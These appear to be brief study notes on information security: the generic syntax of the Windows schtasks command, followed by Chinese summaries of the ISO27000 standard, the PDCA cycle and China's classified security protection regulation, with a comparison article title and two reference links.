schtasks /create /tn TaskName /tr TaskRun /sc schedule [/mo modifier] [/d day] [/m month[,month...] [/i IdleTime] [/st StartTime] [/sd StartDate] [/ed EndDate] [/scomputer [/u [domain]user /p password]] [/ru {[Domain]User | "System"} [/rpPassword]] /?
ISO27000是国际知名的信息安全管理体系标准,适用于整个企业,不仅仅是IT部门,还包括业务部门、财务、人事等部门。引入信息安全管理体系就可以协调各个方面信息管理,从而使管理更为有效。保证信息安全不是仅有一个防火墙,或找一个24小时提供信息安全服务的公司就可以达到的。它需要全面的综合管理。
PDCA(plan do check action)管理循环
《信息安全等级保护管理办法》是为规范信息安全等级保护管理,提高信息安全保障能力和水平,维护国家安全、社会稳定和公共利益,保障和促进信息化建设,根据《中华人民共和国计算机信息系统安全保护条例》等有关法律法规而制定的办法。
浅谈信息安全等级保护与ISO27000系列标准的异同 ISSN 1009-3044
等保是以国家安全、社会秩序和公共利益为出发点,构建国家的安全保障体系。27000系列是以保证组织业务的连续性,缩减业务风险,最大化投资收益为目的,保证组织的业务安全
http://www.4hou.com/technology/9090.html
https://blog.csdn.net/quiet_girl/article/details/50716312